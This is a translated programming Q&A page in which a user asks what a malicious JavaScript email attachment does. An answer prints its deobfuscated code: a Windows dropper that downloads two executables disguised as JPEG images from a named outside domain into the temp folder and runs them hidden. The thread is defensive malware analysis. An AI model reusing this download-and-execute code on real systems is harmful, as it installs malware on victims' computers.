1. 首頁
  2. 問答
  3. 需要幫助搞清楚Js的功能

需要幫助搞清楚Js的功能

2015-03-13 69 views
-7

如果有人知道這個Java腳本文件中發生了什麼,你能告訴我嗎?我們的一位客戶將此作爲電子郵件發送給她,現在她無法打開任何文檔或電子表格。也看起來像傳播到網絡的其餘部分。需要幫助搞清楚Js的功能

如果有人能幫助我理解它,我將非常感激。

我刪除了它,而不是我想要其他人獲得的東西。

我可能不需要告訴任何人,但請不要打開它,除非它在沙箱。我不負責,如果你磚你的電腦。

來源:PM我要的文件,而..

來源

2015-03-13 IT kid

+0

它使用'WScript.Shell'做一些事情,不知道的是,虐待看看它 – epoch 2015-03-13 07:59:24

+0

在鏈接那種態度,對於你認爲是病毒的,是不小心的。我希望大多數人在點擊前閱讀,並且他們不允許activeX內容明顯從未知域運行。 – Mackan 2015-03-13 07:59:26

+0

我不明白爲什麼這是得到這麼多downvotes,只要你有知識,這是一個有趣的事情來解決,因爲它可能不是問這裏最好的問題... – epoch 2015-03-13 08:24:40

回答

3

基本上,這是一個下載病毒的臨時文件夾並執行它...

你應該運行整個網絡上的病毒掃描。

var AxProxy = function() {}; 

(function() { 
    function fFh(fr, Klw, rn) { 
     var VeZ = new AxProxy('WScript.Shell'); 
     var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw; 
     var OG4 = new AxProxy('MSXML2.XMLHTTP'); 

     OG4['onReadyStateChange'] = function() { 
      if (OG4['readyState'] === 4) { 
       var g38 = new AxProxy('ADODB.Stream'); 

       g38['open'](); 
       g38['type'] = 1; 
       g38['write'](OG4['ResponseBody']); 
       g38['position'] = 0; 
       g38['saveToFile'](Klw, 2); 
       g38['close'](); 
      } 
     }; 

     try { 
      OG4['open']('GET', fr, false); 
      OG4['send'](); 

      if (rn > 0) { 
       VeZ['Run'](Klw, 0, 0); 
      } 
     } catch (er) {}; 
    } 

    fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1); 
    fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1); 
}();

所有其他變量只是意圖混淆和阻礙解碼。

PS:我代理ActiveXObject所以這不能運行...

來源

2015-03-13 08:50:46 epoch

+1

時代如果我有足夠的代表upvote,我會的。謝謝你兄弟,你真的幫助我這個。那是我正在尋找的精確。 – 2015-03-13 09:07:05

+0

沒有probs男人:)我認爲你仍然可以接受(與複選標記圖標)。希望你修復你的電腦:) – epoch 2015-03-13 09:11:12

+1

哈哈。是的,它的gona需要一段時間:P但乾草!至少現在我知道我在找什麼。感謝比勒陀利亞男傑! #Capetownproblems – 2015-03-13 09:16:52

相關問題

 相關問題